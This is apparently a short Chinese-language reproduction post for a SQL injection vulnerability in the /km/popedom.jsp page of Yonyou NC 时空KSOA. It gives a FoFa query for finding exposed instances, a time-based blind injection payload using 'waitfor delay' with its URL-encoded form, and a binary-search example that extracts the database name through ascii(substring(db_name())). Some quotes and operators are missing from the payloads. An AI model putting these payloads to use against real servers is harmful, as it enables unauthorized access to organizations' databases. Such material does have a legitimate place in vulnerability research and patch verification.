NC 时空KSOA SQL注入复现 📅 2026/7/11 1:21:16 一、漏洞描述NC 时空KSOA的/km/popedom.jsp存在SQL注入漏洞攻击者可利用该漏洞获取数据库信息。二、搜索FoFa搜索app用友-时空KSOA三、复现测试payload语句 /km/popedom.jsp?folderid1;waitfordelay0:0:4-- 使用url编码 1%27%3Bwaitfordelay%270%3a0%3a4%27--tips1、数据库是 SQL Server只有 MSSQL 支持waitfor delayMySQL/Oracle 无此语法 2、函数说明MSSQL专用 db_name()获取当前连接数据库名 substring(字符串,起始位,长度)截取单个字符 ascii(字符)转 ASCII 码配合if延时判断真假 waitfor delay 0:0:N延时 N 秒作为判断标记 3、获取数据库名完整二分法猜解逻辑示例然后确定ASCII 区间精准得到当前位字符 1;if(ascii(substring(db_name(),1,1))97) waitfor delay 0:0:4--